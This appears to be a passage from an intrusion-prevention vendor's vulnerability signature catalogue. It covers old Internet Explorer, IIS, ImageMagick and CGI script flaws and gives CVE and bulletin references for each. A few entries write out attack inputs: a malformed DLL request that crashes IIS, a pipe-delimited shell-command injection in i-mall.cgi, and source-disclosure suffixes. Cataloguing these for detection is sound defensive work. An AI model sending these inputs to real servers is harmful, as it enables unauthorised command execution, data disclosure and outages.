Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Some versions of Internet Explorer crash when they encounter a crafted Web page that uses the window.createPopup function to invoke a http-equiv meta tag.

Situation:

HTTP_Ie-HTTP-Equiv-Meta-Tag-DoS
File-Text_Microsoft-Internet-Explorer-HTTP-Equiv-Meta-Tag-Denial-of-Service

References:

CVE-2004-0479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0479

BID-10351
http://www.securityfocus.com/bid/10351

HTTP-Ie-Showhelp-Double-Colon-System-Compromise

About this vulnerability:

IE allows arbitrary local files to be executed with Showhelp and ::

Risk:

Moderate

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Internet Explorer allows arbitrary local files to be executed with the showHelp() function. By using a URL containing '/../' and a filename that ends with '::', remote attackers can execute arbitrary local files by tricking the victim to a specifically crafted web page.

Situation:

HTTP_Ie-Showhelp-Double-Colon-System-Compromise
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Colon-System-Compromise

References:

CVE-2003-1041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1041

BID-9320
http://www.securityfocus.com/bid/9320

MS04-023
http://technet.microsoft.com/security/bulletin/MS04-023

HTTP-Ie-Showhelp-Double-Slash-System-Compromise

About this vulnerability:

IE allows execution of arbitrary local .chm files prefixed with \\

Risk:

Moderate

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Internet Explorer's ms-its protocol handler does not process correctly the double backslashes '\\'. This allows executing local CHM files by adding double backslashes before the target file name.

Situation:

HTTP_Ie-Showhelp-Double-Slash-System-Compromise
File-Text_Microsoft-Internet-Explorer-Showhelp-Double-Slash-System-Compromise

References:

CVE-2004-0475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0475

BID-10348
http://www.securityfocus.com/bid/10348

HTTP-IE5-Filename-Buffer-Overflow

About this vulnerability:

IE 5 buffer overflow in filename handling

Risk:

High

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 98; Windows 95; Windows 98 SE

Software:

Internet Explorer 5.0

Type:

Buffer Overflow

Description:

Microsoft Windows 95 and 98 have a buffer overflow vulnerability in the networking code that handles filenames. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

HTTP_IE5-Filename-BOF
File-Text_Microsoft-Internet-Explorer-Filename-Buffer-Overflow

References:

BID-779
http://www.securityfocus.com/bid/779

HTTP-IIS-Active-Data-Streams-Source-Code-Disclosure

About this vulnerability:

IIS returns script source code when ::$DATA is appended to URI

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 1.0; IIS 2.0; IIS 3.0; IIS 4.0

Type:

Malfunction

Description:

Microsoft IIS versions 1.0 - 4.0 are vulnerable to a source code disclosure. The file contents are returned when appending the string "::$DATA" after a file in an HTTP request. This allows remote attackers to read script source code from the host.

References:

CVE-1999-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278

BID-149
http://www.securityfocus.com/bid/149

MS98-003
http://technet.microsoft.com/security/bulletin/MS98-003

HTTP-IIS-ActivePerl-PerlIS.dll-Filename-Overflow

About this vulnerability:

Buffer overflow in Microsoft IIS.

Risk:

Critical

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ActivePerl

Type:

Buffer Overflow

Description:

ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems. It contains a remotely exploitable buffer overflow vulnerability in handling of the URL string. Exploitation of this vulnerability may allow for remote attackers to gain access to the target server.

Situation:

HTTP_CSU-IIS-ActivePerl-PerlIS.dll-Filename-Overflow

References:

CVE-2001-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0815

BID-3526
http://www.securityfocus.com/bid/3526

OSVDB-678
http://www.osvdb.org/678

HTTP-IIS-Asp-Chunked-Transfer-Encoding-Heap-Overflow

About this vulnerability:

Buffer overflow in Microsoft IIS.

Risk:

Critical

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Buffer Overflow

Description:

A buffer overflow condition exists in a certain version of Microsoft IIS. The vulnerability exists in chunked-encoding processing of Active Server Pages. The server is reported to ship with a default script (iisstart.asp,) which is exploitable.

Situation:

HTTP_CSH-IIS-Asp-Chunked-Encoding-Transfer-Heap-Overflow

References:

CVE-2002-0079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0079

BID-4485
http://www.securityfocus.com/bid/4485

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

HTTP-IIS-Asp-Server-Side-Include-Function-Vulnerability

About this vulnerability:

Windows IIS ASP server side include function vulnerabilitys

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

IIS 4.0, 5.0 and 5.1 do not handle the filenames of ASP include files correctly. Remote and local attackers can execute arbitrary files by forcing the server to execute crafted ASP code that tries to include files with long names.

Situation:

HTTP_CS-IIS-Asp-Server-Side-Include-Function-Vulnerability

References:

CVE-2002-0149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0149

BID-4478
http://www.securityfocus.com/bid/4478

OSVDB-3320
http://www.osvdb.org/3320

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

HTTP-IIS-Bat-Remote-Command-Execution

About this vulnerability:

Remote command execution in Microsoft IIS 1.0

Risk:

High

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 1.0

Type:

Metacharacter Injection

Description:

A malicious user can execute arbitrary commands on the target host with the Web server process privileges by sending a specially crafted request.

References:

CVE-1999-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0233

BID-2023
http://www.securityfocus.com/bid/2023

HTTP-IIS-Bdir-Htr-Information-Disclosure

About this vulnerability:

IIS bdir.htr displays directory listings

Risk:

Low

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

When IIS 3.0 is upgraded to 4.0, some scripts are left into the /scripts/iisadmin/ directory. The bdir.htr script allows unauthenticated remote attackers to view directory listings from the server. The vulnerability can be exploited to gain information about the server's directory structure.

References:

BID-2280
http://www.securityfocus.com/bid/2280

HTTP-IIS-BOF-MS99-019

About this vulnerability:

IIS Buffer Overflow (MS99-019)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Windows

Software:

IIS 4.0

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in old IIS 4 WWW servers allows remote compromise if successfully exploited. The vulnerability is located in the handling of .htr, .idc, and .stm extensions.

Situation:

HTTP_CSU-IIS-Htr-Buffer-Overflow

References:

CVE-1999-0874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0874

BID-307
http://www.securityfocus.com/bid/307

MS99-019
http://technet.microsoft.com/security/bulletin/MS99-019

HTTP-IIS-File-Fragment-Disclosure

About this vulnerability:

File Disclosure vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A maliciously crafted URL could cause IIS to use .htr ISAPI extensions for processing requests of other file types. This may lead to file content disclosure.

Situation:

HTTP_CSU-IIS-Htr-File-Fragment-Disclosure

References:

BID-2313
http://www.securityfocus.com/bid/2313

MS01-004
http://technet.microsoft.com/security/bulletin/MS01-004

HTTP-IIS-File-Request-Parsing-Vulnerability

About this vulnerability:

IIS File Request Parsing Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

IIS

Type:

Directory Traversal

Description:

IIS allows the passing of additional commands to requests to valid executable files. This vulnerability allows the attacker to execute commands under the IUSR_machinename context as long as access to a valid executable is available.

References:

CVE-2000-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0886

BID-1912
http://www.securityfocus.com/bid/1912

MS00-086
http://technet.microsoft.com/security/bulletin/MS00-086

HTTP-IIS-Form_JScript-Cross-Site-Scripting

About this vulnerability:

Form_JScript.asp cross-site scripting vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Cross-site Scripting

Description:

A Microsoft IIS sample script /iissamples/sdk/asp/interaction/Form_JScript.asp contains a security vulnerability that allows a remote cross site scripting attack.

Situation:

HTTP_CSU-IIS-FormJScript-Access

References:

OSVDB-470
http://www.osvdb.org/470

HTTP-IIS-Hit-Highlighting-Authentication-Bypass

About this vulnerability:

IIS Hit-Highlighting authentication bypass vulnerability allows file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-168-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Input Validation

Description:

A vulnerability in Microsoft IIS 'Hit-highlighting' functionality has authentication bypass vulnerability that allows remote attackers to gain access to potentially sensitive information.

Situation:

HTTP_CRL-IIS-WebHitsfile-Access

References:

CVE-2007-2815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2815

BID-24105
http://www.securityfocus.com/bid/24105

OSVDB-41091
http://www.osvdb.org/41091

HTTP-IIS-HTMLEncode-BOF-MS08-006

About this vulnerability:

IIS HTMLEncode buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-168-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in HTMLEncode Method. The flaw can be exploited through malicious input to ASP pages that use the vulnerable method. A successful exploit of this vulnerability could let remote attackers execute arbitrary code in the context of the Worker Process Identity,

Situation:

HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-1
HTTP_CS-IIS-HTMLEncode-BOF-MS08-006-2

References:

CVE-2008-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0075

BID-27676
http://www.securityfocus.com/bid/27676

MS08-006
http://technet.microsoft.com/security/bulletin/MS08-006

HTTP-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability

About this vulnerability:

Buffer overflow in Microsoft IIS 4.0/5.0.

Risk:

Critical

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Buffer Overflow

Description:

A buffer overflow condition in ISAPI HTR extension, related to checked encoding transfer mechanism, enables attacker to execute arbitrary instructions on the server or cause a denial of service.

Situation:

HTTP_CSH-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability

References:

CVE-2002-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0364

BID-4855
http://www.securityfocus.com/bid/4855

MS02-028
http://technet.microsoft.com/security/bulletin/MS02-028

HTTP-IIS-Htr-Code-Fragment-Disclosure

About this vulnerability:

Source code disclosure in Microsoft IIS 4.0/5.0.

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1640-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Metacharacter Injection

Description:

Certain versions of Microsoft IIS can be tricked into disclosing the source code of Active Server Pages by appending a "+.htr" toa request of a known script. This information can be potentially used to gain information needed for system compromise.

Situation:

HTTP_CSU-IIS-Htr-File-Fragment-Disclosure

References:

CVE-2000-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0630

BID-1488
http://www.securityfocus.com/bid/1488

MS00-044
http://technet.microsoft.com/security/bulletin/MS00-044

HTTP-IIS-IDQ-IDA-HTX-Path-Disclosure

About this vulnerability:

Path disclosure in Microsoft IIS via IDQ, IDA or HTX files

Risk:

Low

First detected in:

sgpkg-ips-4-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0; IIS 5.0

Type:

Insecure Configuration

Description:

IIS Server error message discloses the document root path if the user requests an .idq, .ida or .htx suffixed file from a network share.

Situation:

HTTP_IIS-IDQ-IDA-HTX-Access
HTTP_IIS-IDQ-IDA-HTX-Access-Unsuccess
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access-Unsuccess
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access

References:

CVE-2000-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0071

BID-1065
http://www.securityfocus.com/bid/1065

HTTP-IIS-Iissample-Discovery

About this vulnerability:

Information Disclosure

Risk:

High

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A disclosure vulnerability in IIS.

Situation:

HTTP_CSU-IIS-Iissamples-Disclosure

References:

CVE-2000-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0098

BID-968
http://www.securityfocus.com/bid/968

MS00-006
http://technet.microsoft.com/security/bulletin/MS00-006

HTTP-IIS-Index-Server-Path-Disclosure-Vulnerability

About this vulnerability:

IIS Index Server Path Disclosure Vulnerability

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

The Index Server contains a vulnerability which could allow the attacker to gain information about the directory structure.

Situation:

HTTP_CSU-IIS-Index-Server-Path-Disclosure-Vulnerability

References:

CVE-1999-1397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1397

BID-476
http://www.securityfocus.com/bid/476

HTTP-IIS-Isapi-Dot-Printer-BOF

About this vulnerability:

IIS Isapi Dot Printer BOF

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1607-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

Unchecked input to msw3prt.dll can be used to cause a buffer overflow in the IIS. This can lead to a complete system compromise.

Situation:

HTTP_CS-IIS-Isapi-Dot-Printer-BOF

References:

CVE-2001-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0241

BID-2674
http://www.securityfocus.com/bid/2674

OSVDB-3323
http://www.osvdb.org/3323

MS01-023
http://technet.microsoft.com/security/bulletin/MS01-023

HTTP-IIS-Isapi-Filter-Denial-Of-Service

About this vulnerability:

W3svc.dll IIS Isapi filter long URL DoS

Risk:

Moderate

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

The Internet Information Server IIS ISAPI filter for Frontpage extensions and ASP.NET does not properly handle error conditions triggered by a very long URL. This may lead to a denial of service condition where the web services become unavailable.

References:

CVE-2002-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0072

BID-4479
http://www.securityfocus.com/bid/4479

OSVDB-3326
http://www.osvdb.org/3326

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

HTTP-IIS-Isapi-Global-Asa-Configuration-Vulnerability

About this vulnerability:	IIS Isapi Global Asa Configuration Vulnerability
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	IIS
Type:	Configuration Error
Description:	Global.asa is an ISAPI configuration file that may contain user names, passwords and sensible IIS configuration information. This file may be publicly accessible due to a configuration error.
Situation:	HTTP_CSU-IIS-Global-Asa-Access

HTTP-IIS-Isapi-Htr-Buffer-Overflow

About this vulnerability:

Isapi Htr Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-167-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Buffer Overflow

Description:

A buffer overflow in processing Isapi .htr extensions allows remote code execution

Situation:

HTTP_CRL-IIS-Isapi-Htr-BOF

References:

CVE-2002-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0071

BID-4474
http://www.securityfocus.com/bid/4474

OSVDB-3325
http://www.osvdb.org/3325

MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018

HTTP-IIS-ISM-DLL-Administration-Vulnerability

About this vulnerability:

ism.dll administration vulnerability in IIS4

Risk:

Moderate

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

When IIS 2 or IIS 3 is upgraded to IIS 4, the ism.dll library is left in the /scripts/iisadmin/ directory. A remote attacker can call this DLL in an HTTP request to gain access to sensitive information on the server.

Situation:

HTTP_CSU-IIS-ISM-DLL-Access

References:

CVE-1999-1538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1538

BID-189
http://www.securityfocus.com/bid/189

HTTP-IIS-Malformed-Url-Denial-Of-Service

About this vulnerability:

IIS malformed URL DoS

Risk:

Moderate

First detected in:

sgpkg-ips-63-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

Microsoft IIS suffers from a vulnerability in the handling of malformed URLs. If a dynamically linked library (DLL) resource is requested multiple times via a crafted request, the server may shut down. A remote attacker can trigger the vulnerability by sending a request with the following format: GET /test/test.dll/%01/~0, where the last character may be any digit, and the previous directory name must contain a character from a certain range. A successful exploit shuts down the server, resulting in a denial of service situation.

Situation:

HTTP_CSU-Microsoft-IIS-Malformed-Url

References:

CVE-2005-4360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4360

BID-15921
http://www.securityfocus.com/bid/15921

OSVDB-21805
http://www.osvdb.org/21805

MS07-041
http://technet.microsoft.com/security/bulletin/MS07-041

HTTP-IIS-Ntdll-WebDAV-BOF

About this vulnerability:

IIS ntdll.dll buffer overflow exploitable via WebDAV

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows 2000; Windows XP

Software:

IIS 5.0

Type:

Buffer Overflow

Description:

Buffer overflow vulnerability exists in the ntdll.dll library. It can be exploited with a carefully crafted WebDAV request. A successful exploit gives the attacker a remote access.

Situation:

HTTP_CS-IIS-Ntdll-WebDAV-BOF

References:

CVE-2003-0109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0109

BID-7116
http://www.securityfocus.com/bid/7116

MS03-007
http://technet.microsoft.com/security/bulletin/MS03-007

HTTP-IIS-ServerVariables-JScript-Path-Disclosure-Vulnerability

About this vulnerability:

Path disclosure vulnerability reveals IIS installation information

Risk:

Low

First detected in:

sgpkg-ips-168-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Insecure Configuration

Description:

A vulnerability in ServerVariables_Jscript.asp script allows remote attacker to gain information of the IIS server that may be lead to further attacks possibly compromising the server.

Situation:

HTTP_CSU-IIS-ServerVariablesJScript-Path-Disclosure

References:

OSVDB-471
http://www.osvdb.org/471

HTTP-IIS-Unicode-Directory-Traversal-1

About this vulnerability:

IIS Unicode Directory Traversal 1

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

IIS

Type:

Directory Traversal

Description:

Microsoft IIS suffers from a directory traversal vulnerability which when encoding the / and \ in extended unicode. This allows the attacker to view any known file on the system with the IUSR_machinename privileges.

Situation:

HTTP_CSU-Cmd-Exe-System-Compromise

References:

CVE-2000-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884

BID-1806
http://www.securityfocus.com/bid/1806

OSVDB-436
http://www.osvdb.org/436

MS00-078
http://technet.microsoft.com/security/bulletin/MS00-078

HTTP-IIS-WebDAV-MS01-016-DOS

About this vulnerability:

Denial of Service in IIS

Risk:

High

First detected in:

sgpkg-ips-259-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A Denial of service vulnerability in IIS 5 WebDAV.

Situation:

HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-016

References:

CVE-2001-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0151

BID-2453
http://www.securityfocus.com/bid/2453

MS01-016
http://technet.microsoft.com/security/bulletin/MS01-016

HTTP-IIS-WebDAV-MS01-016-Search-DOS

About this vulnerability:

Denial of Service in IIS

Risk:

High

First detected in:

sgpkg-ips-259-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A Denial of service vulnerability in IIS 5 WebDAV.

Situation:

HTTP_CS-Microsoft-IIS-WebDAV-Search-DOS-MS01-016

References:

CVE-2001-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0151

BID-2453
http://www.securityfocus.com/bid/2453

MS01-016
http://technet.microsoft.com/security/bulletin/MS01-016

HTTP-IIS-WebDAV-MS01-044-DOS

About this vulnerability:

Denial of Service in IIS

Risk:

High

First detected in:

sgpkg-ips-259-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

A Denial of service vulnerability in IIS 5 WebDAV.

Situation:

HTTP_CS-Microsoft-IIS-WebDAV-Propfind-DOS-MS01-044

References:

CVE-2001-0508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0508

BID-3194
http://www.securityfocus.com/bid/3194

OSVDB-5633
http://www.osvdb.org/5633

OSVDB-5606
http://www.osvdb.org/5606

MS01-044
http://technet.microsoft.com/security/bulletin/MS01-044

HTTP-Imagefolio-Cgi-Cross-Site

About this vulnerability:

Cross-site scripting vulnerability in ImageFolio

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

BizDesigns ImageFolio

Type:

Malfunction

Description:

BizDesigns' ImageFolio has an input-validation vulnerability that allows cross-site scripting. Remote attackers can create URLs that contain arbitrary scripting code, which will be executed by legimate users' browsers. This allows attackers to access target user's cookies and recently-submitted data.

References:

CVE-2002-1334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1334

BID-6265
http://www.securityfocus.com/bid/6265

HTTP-Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow

About this vulnerability:	Buffer overflow vulnerability in ImageMagick SGI decoder component
Risk:	Moderate
First detected in:	sgpkg-ips-80-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Imagemagick
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in the handling of a malicious SGI file containing a crafted BPC field in ImageMagick SGI decoder component. The vulnerability can be exploited by persuading a target user to download a malicious SGI file and open it with the vulnerable product. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.
Situation:	HTTP_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow File-Binary_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow

HTTP-Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in ImageMagick SGI decoder component

Risk:

Moderate

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Imagemagick

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of a malicious SGI file containing a crafted ZSIZE field in ImageMagick SGI decoder component. The vulnerability can be exploited by persuading a target user to download a malicious SGI file and open it with the vulnerable product. This causes a DoS or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
File-Binary_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow

References:

CVE-2006-4144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4144

BID-19507
http://www.securityfocus.com/bid/19507

OSVDB-27951
http://www.osvdb.org/27951

HTTP-Imall-Commerce-Script-System-Compromise

About this vulnerability:

I-Mall Commerce allows arbitrary commands execution with URLs

Risk:

High

First detected in:

sgpkg-ips-17-1210

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

I-Mall Commerce

Type:

Malfunction

Description:

I-Mall Commerce's i-mall.cgi allows arbitrary commands to be executed with the webserver's uid. Arbitrary shell commands can be sent in the URL, separated with pipe characters (i.e., /i-mall/i-mall.cgi?p=|command|).

References:

BID-10626
http://www.securityfocus.com/bid/10626

HTTP-Index-Server-Source-Code-Disclosure

About this vulnerability:

Index Server can be exploited to reveal script source code

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Index Server

Type:

Malfunction

Description:

Microsoft Index Server can be exploited to reveal the unprocessed source code of scripts. When a request is sent to null.htw with the wanted file name appended with '%20' in the CiWebHitsFile argument, CiHiliteType set to Full and CRestrictions to none, the script source is returned. The exploit can be used on any machine with a vulnerable Index Server installed.

Situation:

HTTP_CSU-Index-Server-Source-Code-Disclosure

References:

CVE-2000-0302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0302

BID-1084
http://www.securityfocus.com/bid/1084

OSVDB-271
http://www.osvdb.org/271

MS00-006
http://technet.microsoft.com/security/bulletin/MS00-006

HTTP-Info2www-Cgi-System-Compromise

About this vulnerability:

Command execution vulnerability in the info2www script

Risk:

High

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Roar Smith info2www

Type:

Malfunction

Description:

Info2www, a script used to convert GNU Info Nodes into HTML, allows remote attackers to execute arbitrary commands on the web server. The vulnerability can be exploited by sending a suitable parameter to info2www.

References:

CVE-1999-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0266

BID-1995
http://www.securityfocus.com/bid/1995

HTTP-Infornautics-Getdoc-Cgi-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Infornautics getdoc.cgi

Risk:

Low

First detected in:

sgpkg-ips-9-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Infonautics getdoc.cgi

Type:

Malfunction

Description:

Infonautic's applications use getdoc.cgi to view/purchase documents. Remote users can remove a parameter from the request to getdoc.cgi to bypass the payment phase, allowing users to read arbitrary documents without paying for them.

References:

CVE-2000-0288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0288

HTTP-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a heap memory corruption vulnerability in Internet Explorer. By persuading a target user to visit a malicious web site, a remote attacker can cause a DoS or execute non-privileged arbitrary code on the target host.

Situation:

HTTP_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

References:

CVE-2006-1303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1303

BID-18328
http://www.securityfocus.com/bid/18328

OSVDB-26442
http://www.osvdb.org/26442

MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021

HTTP-Internet-Explorer-Com-Object-System-Compromise

About this vulnerability:

Microsoft Internet Explorer does not correctly handle CLSIDs that refer to COM objects that are not ActiveX components

Risk:

High

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

Microsoft Internet Explorer does not correctly handle references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be triggered by viewing a malicious HTML page with Internet Explorer. A successful exploit allows arbitrary code execution on the victim's computer.

Situation:

HTTP_Internet-Explorer-Com-Object-System-Compromise
File-Text_Internet-Explorer-Com-Object-System-Compromise

References:

CVE-2005-2087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2087

BID-14087
http://www.securityfocus.com/bid/14087

OSVDB-17680
http://www.osvdb.org/17680

MS05-037
http://technet.microsoft.com/security/bulletin/MS05-037

HTTP-Internet-Explorer-Compressed-Content-Url-Buffer-Overflow

About this vulnerability:

Internet Explorer compressed content URL buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-77-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

When it is installed on Windows 2000 or Windows XP SP1 systems which have the update "Microsoft Security Bulletin MS06-042", Microsoft Internet Explorer with Service Pack 1 is vulnerable to a buffer overflow. If an URL of over 260 bytes is followed on a vulnerable system and the server replies with a compressed HTTP reply, a buffer overflow occurs. This allows remote attackers to execute arbitrary code by enticing users to follow a crafted link.

References:

CVE-2006-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3869

BID-19667
http://www.securityfocus.com/bid/19667

OSVDB-28132
http://www.osvdb.org/28132

HTTP-Internet-Explorer-Content-Type-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of the Content-Type header in Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-73-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of the Content-Type header in Internet Explorer that can be exploited to cause a denial of service condition.

Situation:

